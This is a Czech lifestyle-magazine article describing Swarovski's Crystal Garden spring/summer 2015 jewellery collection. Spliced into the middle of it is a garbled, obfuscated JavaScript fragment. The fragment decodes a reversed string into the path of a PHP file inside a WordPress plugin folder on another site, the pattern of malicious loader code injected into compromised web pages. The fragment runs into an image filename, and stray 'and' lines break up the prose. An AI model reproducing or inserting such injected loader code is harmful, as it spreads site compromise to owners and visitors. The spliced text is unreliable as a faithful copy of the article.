FACESTARŽivotní stylOBJEVTE S NÁMI KŘIŠŤÁLOVOU ZAHRADU A NECHTE SE UNÉST JEJÍ NEŽNOU KRÁSOU

OBJEVTE S NÁMI KŘIŠŤÁLOVOU ZAHRADU A NECHTE SE UNÉST JEJÍ NEŽNOU KRÁSOU

 

 

Kolekce Crystal Garden pro sezónu jaro/léto 2015 je inspirována přírodou, konkrétně zahradou. Nejedná se však o běžnou zahradu, ale o moderní zahradu snů, sahající od měkkých jarních pastelových tónů po letní bohatou a zářivě barevnou paletu. „Příroda měla pro společnost Swarovski vždy zvláštní význam. Kolekce Crystal Garden je živoucím důkazem naší vášně pro moderní trendy. Tentokrát jsme čerpali inspiraci z fauny i flóry, abychom vytvořili proměnlivé ženské linie a motivy,“ vysvětluje kreativní ředitelka Nathalie Colin.

and

U náhrdelníku „Crown“ jsou ohromující hroty broušeného křišťálu zasazeny do originálních lůžek zlaté barvy, které kontrastují s pyramidami křišťálových pavé. Minimalistická řada „Click“ představuje kovy upravené do perlového efektu, doplněné o pavé křišťály. 

Tato současná zahrada, vzdušná a plná světla, se zrcadlí v kovových tepaných ornamentech, organických formách a v kamenech broušených do tvaru oválů, navet a hrušky, aby přirozeně znázorňovaly elegantní listy a okvětní plátky. Celou nabídku, prozářenou zlatými kovovými tóny připomínajícími planoucí slunce, tvoří nejrůznější kombinace křišťálů v šedozelených, růžových a tyrkysových odstínech.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandy20cubist.jpg“ />

Stylová, avšak poetická řada „Candy“, která se inspirovala říší hmyzu a motýly, obsahuje modely oplývající skutečně vytříbenou jemností, například přívěsek prozářený ručně osazenými křišťály s použitím exkluzivní techniky Pointiage®. Téma „Cubist“, využívající grafické linie s motivy stylu art deco, si pohrává s efekty kovových ornamentů, které zdůrazňují třpyt miniaturních pavé křišťálů. 

Kolekce, mezi jejíž další hlavní rysy patří všestrannost a rozmanitost, je skvělým společníkem dnešní všestranné ženy a hodí se pro kteroukoli denní či noční příležitost. Téma přírody je primárně ztvárněno prostřednictvím barev. Ty jsou nepopiratelně silnou stránkou značky, která používá vlastní portfolio 150 odstínů a efektů křišťálu

and

Náramek „Stardust“ se třpytí celou řadou pastelových tónů. Tyto náramky, v jednoduchém provedení se 730 drobnými křišťály nebo v dvojitém s 1460 křišťály, lze nyní získat v dvoubarevných verzích a také v podobě náhrdelníků, které ženám zajistí bezkonkurenční třpyt od rána do večera. 

and

Svěžest a hebkost přinášejí pastelové odstíny, například u náhrdelníku „Clay“, sestaveného z pružně splývajících řad růžových a akvamarínových křišťálů v kombinaci se šňůrami perel ze světle fialového křišťálu. Náramek „Céleste“ ve velikosti XXL září bohatými křišťálovými ozdobami, které odlehčují vrstvy plexiskla, na němž jako by se elegantně vznášely křišťály osazené proslulou technikou „Crystal Rock“.

Kolekce Crystal Garden pro sezónu jaro/léto 2015, koupající se v záplavě světel a barev, nabízí nepřeberné množství šperků, od decentních až po hýřivě nápadné, z nichž každý dodá styl a třpyt do každodenního života. Ozdobte se a vykročte jaru vstříc s blyštivou náladou…

Související články